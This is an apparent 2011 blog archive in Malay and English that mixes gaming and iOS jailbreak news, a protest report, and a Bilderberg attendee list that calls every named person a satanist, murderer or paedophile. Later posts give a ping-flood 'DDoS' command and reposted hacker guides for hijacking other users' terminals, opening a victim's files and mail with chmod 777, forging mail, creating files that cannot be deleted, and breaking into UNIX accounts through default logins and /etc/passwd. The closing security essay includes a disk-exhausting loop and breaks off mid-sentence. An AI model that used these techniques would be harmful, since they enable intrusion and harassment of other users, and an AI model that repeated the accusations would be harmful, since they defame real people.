Saturday, 31 December 2011

Dia ni pun boleh - Kita Bagaimana?


Matlo Releases Game Input MultipleXer v0.25

Game Input multiplexer has been released by developer Matlo. Formerly known as Sixaxis Emulator this allows you to control your PS3 via PC using bluetooth or usb. Some features include the connection of up to seven controllers, multiple joysticks, keyboards, mouse and also controller profiles.

GIMX stands for Game Input MultipleXer or Game Input MatriX. The purpose of this software is to control a video game console with a PC. It currently only works with the PS3, but the Xbox 360 is a also targeted.

It operates:

Over bluetooth:

Works with Linux only. A compatible bluetooth dongle is required. Tutorial: Link

Over usb:

Works with Linux and Windows. A usb-usb adapter is required. Tutorial: Link

The application gets data from the PC peripherals (mice, keyboards and joysticks) and sends controls to the PS3 over bluetooth or usb.

Other controls such as gesture or voice are possible through the emulation of PC peripherals.

Changelog v0.25:
The joystick now works / joysticks names are filled in gimx-config
Support of the navigation stick
The "Link Control" menu is checked by default
Config gimx do more bug in Linux
The combo boxes (dropdown lists) of Gimx-serial now work

Features:
Up to 7 controllers (Linux + Bluetooth only) - requires a BT dongle for each controller
Up to 8 profiles per controller
Quick change of the profile with change mode "return"
Supported devices: mice, keyboards, game controllers (gamepads, steering wheels, )
Multiple joysticks, mice and keyboards
Configuration of GUIs with automatic notification and detection devices
Mappings button to button, pin to pin, push-to-pin and pin-to-button
Mapping of the mouse customizable (dead zone, sensitivity, acceleration)
Graphical display of the controller status
Calibration Mode the mouse
Smoothing of the mouse
Macros for clavier

Known Issues:
Motion sensing axis control
Motion sensing events
Custom minimal duration time for button events
1:1 translation
[Windows] Some mouse buttons are not working
[usb] Some games are not compatible with gamepads other than the sixaxis/dualshock 3
TCP/IP Support
Shift states
Translate GUI
Trigger intensity
Support for windows virtual devices (virtual keyboard, )
Event scheduling for macros
Make gimx-fpsconfig capable of editing configs produced by gimx-config
Improvements for config examples
Diamond / flexible dead zone
Auto-updater
Auto-updater for config examples
Remove mouse and keyboard names if "Multiple mice and keyboards" is unchecked.

Source & Downloads:log.gimx.fr

PS Vita Content Manager Concerns by Wololo

The PS Vita Content Manager has been in the spotlight lately. PS Vita developer Wololo brings news via his blog relating to some concerns he has had and also to clear up a few misinterpretations by some websites.

A few days ago I posted my concerns about the “Content Manager” tool, a tool that is compulsory to install and use if you want to copy files from and to your vita. Some people said I was paranoid (see my answer to that at the end of the article), and others shared my concerns and started digging. Interestingly enough, that article gathered almost as much attention as my much more spectacular (in my opinion) video of a Megadrive emulator running on the vita.

Some sites took my words out of context and said that I had proof Sony is spying on us when we copy files. This is not true, I don’t have any proof, just lots of concerns. Because of that I decided to call Sony’s customer service in order to get more information. Read along.

First of all, a piece of relatively good news: some users on French site psvitagen mentioned that it is possible to copy Movies and Music without being connected to the internet, through the dedicated “Music” and “Movie” sections of the vita. I confirmed this is true, so movies, music and pictures can still be copied to the vita even without an internet connection. The internet connection is however, as far as I can tell, required to copy anything else, which, given the limited possibilities of the vita, basically means PSP/Vita games and/or savedata.

In theory and from what I saw so far, the internet connection is probably used for two things: check for new versions of the firmware (an update was enforced on me if I wanted to keep using the content manager 2 days ago), and possibly do some DRM verifications. That’s the theory, and is somewhat confirmed by some early investigations of the binary by dev Hykem. So, when you copy it to your vita, Sony checks that your Vita game or your Sony-purchased movie is actually “ok” to play on your vita, to make sure you didn’t steal it or copied it from a friend’s computer. Fair enough (although I would question why this check needs to be done there, rather than directly on the vita). But what happens for content that does not require any Sony drm check is my concern. Even though it’s possible to copy them without an internet connection, does Sony gather any information on my music, my pictures, or my movies (and how about my games savedata, which do require the internet connection while being transferred) ? Do they collect filenames, id3 tag, or exif information? Probably not, but more transparency on the subject would definitely be welcome. This is not about hacking here, this is about sending private information to a company that has proven regularly that they cannot be trusted with our data.

So ,full of concerns, I decided to call Sony’s customer service today (actually my wife did it for me…). The person we talked to, as expected, wasn’t a technical person and therefore had close to no information on this. She was aware that an internet connection is required, and mentioned to us that this is written on the manual. We explained that we knew that, and that we have an internet connection (it usually takes time when calling a customer service to explain that you don’t have a technical problem using the software, but an ethical one) , but we’d like to disconnect it when it is not necessary, because we don’t see the point in being connected to Sony’s server when we transfer files between two pieces of hardware we own (at which point my wife added: “especially given what happened to your company recently, we’re a bit concerned about our private information“. Hehe, that’s why I love her ). Understanding our concern the person at the customer service contacted somebody more technical to get more information on the subject. She then came back to us and told us this was in place to make sure that the computer running the content manager is correctly “associated” to the Vita. She didn’t have any technical details to share about the firmware upgrade or the DRM verifications, but she guaranteed us that no personal data was being transferred. She also gave us her name (which I won’t share here) in case we have more questions on the subject (but don’t ask me to call them more, first it’s not a free call, and second I already felt super bad to have my wife spend 30 boring minutes on the phone for me because of my new toy)

(one thing I’d like to say is that every time I contacted Sony’s customer service, their answers were fairly fast and accurate. They usually give me bad news, but they’re doing their best to help. The only time they were completely wrong was when my PSP 1000 stopped accepting connecting to Media Go. They told me it was because the PSP was a Japanese PSP, and I was trying to connect to the European store. I knew this wasn’t true since I had no problem doing the exact same thing with two other PSPs. The real cause was probably that Sony had banned my console for some reason. Anwyays overall thumbs up for the efficiency of the customer service)

So, that’s the official answer, but I’m sure some of us will pass the PC parts of the Content Manager through their microscopes to confirm if this is true. But at least now I have some official information from Sony, which is, in a way, positive. Nevertheless, it does not statisfy my curiosity on some of the files found by Hykem, (such as Mp3Promoter.suprx, png_promoter.suprx, etc…) so I’m sure many people will want to learn more about this thing.

Lelaki bertopeng kejutkan sambutan 2012

Keceriaan pengunjung selepas menyaksikan pengiraan detik 12 malam sempena Tahun Baru 2012 di Dataran Merdeka sedikit terganggu apabila sekumpulan lelaki bertopeng dikesan berhampiran lokasi sambutan.
Kumpulan yang disertai kira-kira 100 orang itu dilihat melakukan beberapa aktiviti, dipercayai bagi memperjuangkan kebebasan berkumpul di negara ini.
Mereka bagaimanapun dilihat tidak mengganggu kira-kira 50,000 pengunjung yang hadir bagi menyaksikan konsert Ambang 2012 anjuran Kementerian Penerangan Komunikasi dan Kebudayaan, bermula seawal 8 malam.
Anggota kumpulan itu ada yang memakai kemeja-T tertera tulisan 'Occupy Dataran' dan topeng yang beraspirasikan filem terkenal 'V For Vendetta' manakala sebahagian lagi berpakaian putih, yang dipercayai bermotifkan perjuangan agama.
Polis dilihat dapat mengawal keadaan sehingga semua pengunjung termasuk kumpulan terbabit bergerak meninggalkan Dataran Merdeka.

Sumber,
MalaysiaKini

Friday, 30 December 2011

Teknik DDOS Paling Mudah (Denial Of Service)

Anda juga boleh DDOS sesebuah website dengan hanya menggunakan Command Prompt.
Tidak perlu lagi menggunakan software seperti LOIC, HOIC, RDOS dan sebagainya.

Buka CMD terdahulu, kemudian tulis :

ping -l 5000 -t
dan tekan enter
PS : nak lagi best pakai la Backtrack

Showtime Repack v3.3.356 by Redsquirrel87



Redsquirrel has released an updated version of his unofficial Showtime Media Player repacks. Version 3.3.356 bring the following changes.
Update german translation de_DE
Update Danish translation
VDPAU: Disable spatial deinterlacing on 1080 content. Not all GPUs are fast enuf
VDPAU: If height == 1088, say it's 1080 because it works!
htsp: increase buffer
upnp: Fix arist images in screensaver. Also plug a memory leak
glw: Add support for simulating texture load failures
Use rstr_t on more places
Fix problems with multiopt in javascript
Revert "Add prop_select_first()"
multiopt setting: Make sure something is always selected
Add prop_select_first()

Source: Redsquirrel Twitter
Download: Showtime Repack v3.3.356

Wednesday, 28 December 2011

Official Bilderberg List Of Freemason / Iluminati Satanic Banker Scum 2011

Only Crooks, Traitors to Humanity, Satanists, Murderers and Paedophiles get invited to this Annual meeting of the Bilderbergs! Here is the list of the above types of offenders.

Thanks to Melody for this list. ;-)



Final Unofficial List of Invitees to the 2011 Bilderberg Conference

St. Moritz, Switzerland—June 9-12, 2011

DEU Ackermann, Josef Deutsche Bank AG

GBR Agius, Marcus Chairman, Barclays PLC

USA Alexander, Keith B. Director, National Security Agency

INT Almunia, Joaquín Vice President, Euro. Commission

USA Altman, Roger C. Chairman, Evercore Partners Inc.

FIN Apunen, Matti Finnish Business and Policy Forum

PRT Balsemão, Francisco CEO, IMPRESA, Former PM

FRA Baverez, Nicolas Partner, Gibson, Dunn & Crutcher

FRA Bazire, Nicolas Mʼging Dir. Groupe Arnault /LVMH

ITA Bernabè, Franco CEO, Telecom Italia SpA

USA Bezos, Jeff Founder and CEO, Amazon.com

SWE Bildt, Carl Minister of Foreign Affairs

SWE Björling, Ewa Minister for Trade

NLD Bolland, Marc J. Chief Executive, Marks & Spencer

CHE Brabeck-Letmathe, P. Chairman, Nestlé S.A.

AUT Bronner, Oscar CEO, Standard Medien AG

CAN Carney, Mark J. Governor, Bank of Canada

FRA Castries, Henri de Chairman and CEO, AXA

ESP Cebrián, Juan Luis CEO, PRISA media

NLD Chavannes, Marc E. Columnist, NRC Handelsblad

TUR Ciliv, Süreyya CEO, Turkcell Iletisim Hizmetleri

CAN Clark, Edmund President /CEO, TD Bank Financial

BEL Coene, Luc Governor, National Bank of Belgium

USA Collins, Timothy C. CEO, Ripplewood Holdings, LLC

ESP Cospedal, Maria Secretary General, Partido Popular

INT Daele, Frans van Chief of Staff/European Council

GRC David, George A. Chairman, Coca-Cola H.B.C. S.A.

BEL Davignon, Etienne Minister of State, honorary BB chair

DNK Eldrup, Anders CEO, DONG Energy

ITA Elkann, John Chairman, Fiat S.p.A.

DEU Enders, Thomas CEO, Airbus SAS

AUT Faymann, Werner Federal Chancellor

DNK Federspiel, Ulrik VP, Global Affairs, Haldor Topsøe

USA Feldstein, Martin S. Professor of Economics, Harvard

PRT Ferreira Alves, Clara CEO, Claref LDA; writer

GBR Flint, Douglas J. Group Chairman, HSBC Holdings

CHN Fu Ying Vice Minister of Foreign Affairs

USA Gates, Robert Secretary of Defense

USA Gates, William Chairman, Microsoft Corp.

IRL Gallagher, Paul Senior Counsel; Former AG

CHE Groth, Hans Top-level Exec., Pfizer Europe

TUR Gülek Domac, Tayyibe Former Minister of State

NLD Halberstadt, Victor Honorary Sec. Gen. of BB Meetings

GRC Hardouvelis, Gikas A. Chief Economist, Eurobank EFG

USA Hoffman, Reid Exec. Chair., LinkedIn

CHN Huang Yiping Professor of Economics, Peking U.

USA Hughes, Chris R. Co-founder, Facebook

USA Jacobs, Kenneth M. Chairman & CEO, Lazard

CHE Janom Steiner, Barbara DOJ, Sec. & Health, Canton Grisons

FIN Johansson, Ole Confederation of Finnish Industries

USA Johnson, James A. Vice Chairman, Perseus, LLC

USA Jordan, Jr., Vernon E. Sr. Exec., Lazard Frères & Co. LLC

USA Keane, John M. (Gen.) SCP Partners; U.S. Army, Retired

GBR Kerr, John House of Lords; De. Chair., Royal Dutch Shell

USA Kissinger, Henry A. Chairman, Kissinger Associates, Inc.

USA Kleinfeld, Klaus Chairman and CEO, Alcoa

TUR Koç, Mustafa V. Chairman, Koç Holding A.S.

USA Kravis, Henry R. Co-CEO, Kohlberg Kravis Roberts & Co.

USA Kravis, Marie-Josée Senior Fellow, Hudson Institute, Inc.

INT Kroes, Neelie VP European Commission

CHE Kudelski, André Chair./CEO, Kudelski Group SA

GBR Lambert, Richard Ernst & Young

INT Lamy, Pascal Dir. Gen., World Trade Organization

ESP León Gross, B. Sec. Gen. of the Spanish Presidency

CHE Leuthard, Doris Federal Councillor (president)

FRA Lévy, Maurice Chairman and CEO, Publicis Groupe

BEL Leysen, Thomas Chairman, Umicore

USA Li, Cheng Senior Fellow, Brookings Institution

DEU Löscher, Peter President and CEO, Siemens AG

GBR Mandelson, Peter House of Lords; Chair., Global Couns.

IRL McDowell, Michael Former Deputy PM

CAN McKenna, Frank Deputy Chair, TD Bank Financial

DEU Merkel, Angela Chancellor of Germany

GBR Micklethwait, John Editor-in-Chief, The Economist

FRA Montbrial, Thierry de President, French Institute for Intʼl Rel.

ITA Monti, Mario President, Luigi Bocconi

RUS Mordashov, Alexey A. CEO, Severstal

USA Mundie, Craig J. Chief Strategy Officer, Microsoft

NOR Myklebust, Egil Former Chairman, Norsk Hydro ASA

DEU Nass, Matthias Intʼl Correspondent, Die Zeit

ESP Nin Génova, Juan María President and CEO, La Caixa

PRT Nogueira Leite, António Board, José de Mello Investimentos

NOR Norway, H.R.H. Crown Prince Haakon

FIN Ollila, Jorma Chairman, Royal Dutch Shell

NLD Oranje, Beatrix van Queen of the Netherlands

CAN Orbinksi, James Professor, University of Toronto

USA Orszag, Peter R. Vice Chair., Citigroup Global Markets

GBR Osborne, George Chancellor of the Exchequer

NOR Ottersen, Ole Petter Rector, University of Oslo

GRC Papaconstantinou, G. Minister of Finance

TUR Pekin, Sefika Founding Partner, Pekin & Bayar

FIN Pentikäinen, Mikael Editor-in-Chief, Helsingin Sanomat

USA Perle, Richard N. American Enterprise Institute

CAN Prichard, J. Robert S. Chair, Torys LLP

CAN Reisman, Heather Chair./CEO, Indigo Books & Music

DNK Rasmussen, Anders NATO Secretary General

USA Rockefeller, David Former Chairman, Chase Manhattan

INT Rompuy, Herman van President, European Council

USA Rose, Charlie Exec. Editor/Anchor, Charlie Rose

NLD Rosenthal, Uri Minister of Foreign Affairs

AUT Rothensteiner, Walter Raiffeisen Zentralbank Österreich

FRA Roy, Olivier Professor, European Univ. Institute

USA Rubin, Robert E. CFR; former Treasury Secretary

ITA Scaroni, Paolo CEO, Eni S.p.A.

CHE Schmid, Martin President, Canton Grisons

USA Schmidt, Eric Executive Chairman, Google Inc.

AUT Scholten, Rudolf Oesterreichische Kontrollbank AG

DNK Schütze, Peter Nordea Bank AB

CHE Schweiger, Rolf Swiss Council of States

INT Sheeran, Josette Exec. Dir., UN World Food Program

CHE Soiron, Rolf Holcim Ltd., Lonza Ltd.

INT Solana Madariaga, J. ESADEgeo Ctr. for Glob. Econ. & Geopol.

NOR Solberg, Erna Leader of the Conservative Party

ESP Spain, H.M. Queen Sofia

USA Steinberg, James B. Deputy Secretary of State

DEU Steinbrück, Peer Member of the Bundestag

GBR Stewart, Rory Member of Parliament

IRL Sutherland, Peter D. Chairman, Goldman Sachs

GBR Taylor, J. Martin Chairman, Syngenta International

USA Thiel, Peter A. President, Clarium Capital

ITA Tremonti, Giulio Minister of Economy and Finance

INT Trichet, Jean-Claude President, European Central Bank

GRC Tsoukalis, Loukas President, ELIAMEP

USA Varney, Christine A. Assistant AG for Antitrust

CHE Vasella, Daniel L. Chairman, Novartis AG

USA Vaupel, James W. Founding Director, Max Planck Instit.

SWE Wallenberg, Jacob Chairman, Investor AB

USA Warsh, Kevin Former Gov., Federal Res. Board

NLD Winter, Jaap W. De Brauw Blackstone Westbroek

CHE Witmer, Jürg Chairman, Givaudan and Clariant

INT Wolfensohn, James Chairman, Wolfensohn & Company

ESP Zapatero, Jose Luis Prime Minister of Spain

USA Zoellick, Robert B. President, The World Bank Group

JOURNALISTS

GBR Bredow, Vendeline von The Economist

GBR Wooldridge, Adrian D. The Economist

*COUNTRY CODE/NATION OF ORIGIN:

KEY: AUT: Austria; BEL: Belgium; CAN: Canada; CHE: Switzerland;

CHN: China; DEU: Germany; DNK: Denmark; ESP: Spain; FIN: Finland;

FRA: France; GRC: Greece; GBR: Great Britain; INT: International; IRL:

Ireland; ITA: Italy; NLD: the Netherlands; NOR: Norway; PRT: Portugal;

RUS: Russia; SWE: Sweden; TUR: Turkey; USA: United States

iOS 5.0.1 Untethered Jailbreak is here!

Merry late Christmas! It's here! he iPhone Dev-team has just pushed Redsn0w 0.9.10 b1 to jailbreak 5.0.1 untethered on iPhone 4, 3GS, iPod touch 4G, 3G and iPad 1. pod2g, the man behind the untethered jailbreak, handed his project to iPhone Dev Team and Chronic Dev Team to get implemented on both redsn0w and greenpois0n to release the final product -- iOS 5.0.1 untethered jailbreak.

Supported devices :
iPhone 4 GSM
iPhone 4 CDMA
iPhone 3GS
iPod touch 4G
iPod touch 3G
iPad 1
If you have one of those devices and are not on 5.0.1 yet, update now! The SHSH window is still open for 5.0.1 If you unlock via ultrasn0w or gevey, make sure you only get to 5.0.1 via a custom IPSW! Once you’re at 5.0.1, use the latest redsn0w 0.9.10 to both jailbreak and untether.
If you’re already at 5.0.1 with a tethered jailbreak, you have two choices: either run redsn0w 0.9.10 over your current jailbreak (deselect “Install Cydia” if you do that), or install the Cydia package prepared by the chronic devteam. The patches are the same regardless of which you choose.
Some of you are using a hybrid 5.0/5.0.1 configuration. If so, do not attempt to install this untether over that setup! You will most likely get into a reboot cycle. Do a sync and fresh restore to 5.0.1 then install the jailbreak + untether.

How to jailbreak your iDevice:
Connect your iDevice with your PC via USB, and open iTunes then Restore to iOS 5.0.1 (If you are already running iOS 5.0.1, bypass this step)
Start Redsn0w 0.9.10 b1, and press on "Jailbreak" button
Now select “Install Cydia” and click “Next”.
Now make sure your device is both OFF and PLUGGED IN to the computer before you click “Next”.
At this stage you will be presented with a screen where you will be guided on how to enter DFU mode. Quickly hold “Power” button and then while holding the “Power” button, you will now have to hold “Home” button too. Now after few seconds release “Power” button but keep holding “Home” button until installation begins.
Wait until you get iOS 5.0.1 untethered jailbroken in few minutes.

Downloads:
Redsn0w 0.9.10b1 for Windows (Run in Administrator Mode
Redsn0w 0.9.10b1 for Mac OS X

iOS 5.0.1 ipsw download:
iOS 5.0.1 - iPhone 4 GSM
iOS 5.0.1 - iPhone 4 CDMA
iOS 5.0.1 - iPhone 3GS
iOS 5.0.1 - iPad 1

*** A List Of Some OF The Most Useful UNIX **

*** Hacking Commands, and Some Hints On Their Usage ***

---------------------------------------------------------------

It is fun and often usefull to create a file that is owned
by someone else. On most systems with slack security ie 99% of
all UNIX systems, this is quite easily done. The chown command
will change any of your files to make someone else the owner.
Format is as follows:

chown ownername filelist

Where ownername is the new owner, and filelist is the list of
files to change. You must own the file which your are goin to
change, unless you are a superuser....then u can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file. If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first! Once the
file is owned by someone else, you cant change nything about it!

---------------------------------------------------------------

Sometimes just seeing who is on the system is a challenge in
itself. The best way is to write your own version of who in C,
but if you can't do that then this may be of some help to you:

who followed by on or more of the following flags:

-b Displays time sys as last booted.
-H Precedes output with header.
-l Lists lines waiting for users to logon.
-q displays number of users logged on.
-t displays time sys clock was last changed.
-T displays the state field (a + indicates it is
possible to send to terminal, a - means u cannot)
-u Give a complete listing of those logged on.

**who -HTu is about the best choice for the average user**

##by the way, the list of users logged on is kept in the file
/etc/utmp. If you want to write your own personalised version of
who in C, you now know where to look!###

---------------------------------------------------------------

When a users state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go staright to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.

Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by 'cating' a string to a users screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are sill
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using ths technique you can wipe peoples directories or
anything. My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).

---------------------------------------------------------------

If you ever briefly get access to another persons account
eg. they leave the room to go to toilet or whatever, then simply
type the following:

chmod 777 $HOME
chmod 777 $MAIL

Then clear the screen so they dont see what you just typed.

Now you can go look at their directory, and their mail, and
you can even put mail in their mail file. (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!

---------------------------------------------------------------

Another way to send fake mail to people is to use the mail
server. This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspiscious when
they receive it, but it will fool the average user!

type telnet

the following prompt will appear:

telnet>

now type :

open localhost 25

some crap will come up about the mail server..now type:

mail from: xxxxxx Put any name you want.

some more bullshit will come up. Now type:

rcpt to: xxxxxx Put the name of the person to receive mail here.

now type:

data

now you can type the letter...end it with a "."
type quit to exit once you are done.

-------------------------------------------------------------

Heres one for any experimenters out there...
It is possible to create files which simply cannot be deleted
from the standard shell. To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell. Try things like Ctrl-h (this is the
code for the delete key). Just a file with the name Ctrl-h would
not be deleteable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back.....this is one of my
favourites..gets em every time!

The following script file is an example which will create a
file with the name Ctrl-h. You MUST tyoe this file in using the
vi editor or similar.
*****If you are not very good with vi, type "man vi" and print the
help file...it even contains stuff that I find useful now and
then.*****

type the following in vi...

echo'' > 'a^h'

***NOTE...to get the ^h (this really means ctrl-h) from vi type:

Ctrl v
Ctrl h

The Ctrl v instrcts vi to take the next character as a ascii
character, and not to interpret it.
change the access on the file you just created and now
execute it. It will create a file which looks like it is called
a, but try to delete it !..use wildcards if you really want to
delete it.

*> Title: Tutorial on hacking through a UNIX system


**

In the following file, all references made to the name Unix, may also be
substituted to the Xenix operating system.

Brief history: Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously. Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier. After about 2 years of developmental research, they produced
an operating system they called "Unix".
Sixties to Current: During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient. One of the systems they
put on the Unix system was called "Elmos". Through Elmos many tasks (i.e.
billing,and installation records) could be done by many people using the same
mainframe.

Note: Cosmos is accessed through the Elmos system.

Current: Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful). Microsoft,seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT's. Their result they called
Xenix (pronounced zee-nicks). Both Unix and Xenix can be easily installed
on IBM PC's and offer the same function (just 2 different vendors).

Note: Due to the many different versions of Unix (Berkley Unix,
Bell System III, and System V the most popular) many commands
following may/may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.

How to tell if/if not you are on a Unix system: Unix systems are quite
common systems across the country. Their security appears as such:

Login; (or login;)
password:

When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lower- case. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson). Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password assigned by the sysop or chosen by the user.

Common default logins
--------------------------
login; Password:
root root,system,etc..
sys sys,system
daemon daemon
uucp uucp
tty tty
test test
unix unix
bin bin
adm adm
who who
learn learn
uuhost uuhost
nuucp nuucp

If you guess a login name and you are not asked for a password, and have
accessed to the system, then you have what is known as a non-gifted account.
If you guess a correct login and pass- word, then you have a user account.
And, if you get the root p/w you have a "super-user" account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm Once you are in the system, you will
get a prompt. Common prompts are:

$
%
#

But can be just about anything the sysop or user wants it to be.

Things to do when you are in: Some of the commands that you may want to
try follow below:

who is on (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a (list all files in current directory.)
du -a (checks amount of memory your files use;disk usage)
cd\name (name is the name of the sub-directory you choose)
cd\ (brings your home directory to current use)
cat name (name is a filename either a program or documentation your username has written)
Most Unix programs are written in the C language or Pascal
since Unix is a programmers' environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names and accounts. This can be done by doing the following command:

cat /etc/passwd

If you are successful you will see a list of all accounts on the system. It
should look like this:
root:hvnsdcf:0:0:root dir:/: joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe hal::1:2:Hal Smith:/bin:/bin/hal

The "root" line tells the following info :
login name=root
hvnsdcf = encrypted password
0 = user group number
0 = user number
root dir = name of user
/ = root directory

In the Joe login, the last part "/bin/joe " tells us which directory
is his home directory (joe) is. In the "hal" example the login name is
followed by 2 colons, that means that there is no password needed to get in
using his name.

Conclusion: I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.



On the Security of UNIX

=-=-=-=-=-=-=-=-=-=-=-=

Recently there has been much interest in the security aspects of operating

systems and software.At issue is the ability to prevent undesired disclosure of

information, destruction of information,and harm to the functioning of the

system.This paper discusses the degree of security which can be provided under

the system and offers a number of hints on how to improve security.The first

fact to face is that UNIX was not developed with security,in any realistic

sense,in mind;this fact alone guarantees a vast number of holes.(Actually the

same statement can be made with respect to most systems.)



The area of security in which is theoretically weakest is in protecting against

crashing or at least crippling the operation of the system.The problem here is

not mainly in uncritical acceptance of bad parameters to system calls (there

may be bugs in this area, but none are known)but rather in lack of checks for

excessive consumption of resources.



Most notably, there is no limit on the amount of disk storage used, either in

total space allocated or in the number of files or directories.Here is a

particularly ghastly shell sequence guaranteed to stop the system:





while : ; do

mkdir x

cd x

done



Either a panic will occur because all the i-nodes on the device are used up,

or all the disk blocks will be consumed, thus preventing anyone from writing

files on the device.In this version of the system,users are prevented from

creating more than a set number of processes simultaneously,so unless users

are in collusion it is unlikely that any one can stop the system altogether.



However, creation of 20 or so CPU or disk-bound jobs leaves few resources

available for others.Also, if many large jobs are run simultaneously,swap space

may run out, causing a panic. It should be evident that excessive consumption

of diskspace, files, swap space and processes can easily occur accidentally in

malfunctioning programs as well as at command level.In fact UNIX is essentially

defenseless against this kind of abuse,nor is there any easy fix.The best that

can be said is that it is generally fairly easy to detect what has happened

when disaster strikes ,to identify the user responsible, and take appropriate

action.In practice,we have found that difficulties in this area are rather

rare,but we have not been faced with malicious users,and enjoy a fairly

generous supply of resources which have served to cushion us against accidental

overconsumption.



The picture is considerably brighter in the area of protection of information

from unauthorized perusal and destruction.Here the degree of security seems

(almost) adequate theoretically, and the problems lie more in the necessity for

care in the actual use of the system.Each UNIX file has associated with it

eleven bits of protection information together with a user identification

number and a user-group identification number (UID and GID).



Nine of the protection bits are used to specify independently permission to

read, to write, and to execute the file to the user himself, to members of the

user's group, and to all other users.Each process generated by or for a user

has associated with it an effective UID and a real UID, and an effective and

real GID.When an attempt is made to access the file for reading, writing, or

executing UID for the process is changed to the UID associated with the file;

the change persists until the process terminates or until the UID changed again

by another execution of a set-UID file.Similarly the effective group ID of a

process is changed to the GID associated with a file when that file is executed

and has the set-GID bit set.The real UID and GID of a process do not change

when any file is executed,but only as the result of a privileged system

call.The basic notion of the set-UID and set-GID bits is that one may write a

program which is executableby others and which maintains files accessible to

others only by that program.



The classical example is the game-playing program which maintains records of

the scores of its players.The program itself has to read and write the score

file,but no one but the game's sponsor can be allowed unrestricted access to

the file lest they manipulate the game to their own advantage.



The solution is to turn on the set-UID bit of the game program. When, and only

when,it is invoked by players of the game,it may update the score file but

ordinary programs executed by others cannot access the score. There are a

number of special cases involved in determining access permissions. Since

executing a directory as a program is a meaningless operation,the

execute-permission bit, for directories, is taken instead to mean permission to

search the directory for a given file during the scanning of a path name; thus

if a directory has execute permission but no read permission for a given user,

he may access files with known names in the directory,but may not read (list)

the entire contents of the directory.



Write permission on a directory is interpreted to mean that the user may create

and delete files in that directory;it is impossible for any user to write

directly into any directory..Another, and from the point of view of security,

much more serious special case is that there is a ``super user'' who is able to

read any file and write any non-directory.The super-user is also able to change

the protection mode and the owner UID and GID of any file and to invoke

privileged system calls.It must be recognized that the mere notion of a

super-user is a theoretical, and usually practical, blemish on any protection

scheme.



The first necessity for a secure system is of course arranging that all files

and directories have the proper protection modes.Traditionally, UNIX software

has been exceedingly permissive in this regard;essentially all commands create

files readable and writable by everyone.In the current version,this policy may

be easily adjusted to suit the needs ofthe installation or the individual user.



Associated with each process and its descendants is a mask, which is in effect

anded with the mode of every file and directory created by that process. In

this way, users can arrange that, by default,all their files are no more

accessible than they wish.The standard mask, set by login,allows all permiss-

ions to the user himself and to his group,but disallows writing by others.



To maintain both data privacy and data integrity,it is necessary, and largely

sufficient,to make one's files inaccessible to others. The lack of sufficiency

could follow from the existence of set-UID programs created by the user and the

possibility of total breach of system security in one of the ways discussed

below(or one of the ways not discussed below).



For greater protection,an encryption scheme is available.Since the editor is

able to create encrypted documents, and the crypt command can be used to pipe

such documents into the other text-processing programs,the length of time

during which clear text versions need be available is strictly limited.The

encryption scheme used is not one of the strongest known, but it is judged

adequate, in the sense that cryptanalysisis likely to require considerably more

effort than more direct methods of reading the encrypted files.For example, a

user who stores data that he regards as truly secret should be aware that he is

implicitly trusting the system administrator not to install a version of the

crypt command that stores every typed password in a file. Needless to say, the

system administrators must be at least as careful as their most demanding user

to place the correct protection mode on the files under their control.



In particular,it is necessary that special files be protected from writing, and

probably reading, by ordinary users when they store sensitive files belonging

to otherusers.It is easy to write programs that examine and change files by

accessing the device on which the files live.



On the issue of password security,UNIX is probably better than most systems.

Passwords are stored in an encrypted form which, in the absence of serious

attention from specialists in the field,appears reasonably secure, provided its

limitations are understood.In the current version, it is based on a slightl y

defective version of the Federal DES;it is purposely defective so that

easily-available hardware is useless for attempts at exhaustive

key-search.Since both the encryption algorithm and the encrypted passwords are

available,exhaustive enumeration of potential passwords is still feasible up to

a point.We have observed that users choose passwords that are easy to

guess:they are short, or from a limited alphabet, or in a dictionary.

Passwords should be at least six characters long and randomly chosen from an

alphabet which includes digits and special characters.



Of course there also exist feasible non-cryptanalytic ways of finding out

passwords.For example: write a program which types out ``login:''on the

typewriter and copies whatever is typed to a file of your own. Then invoke the

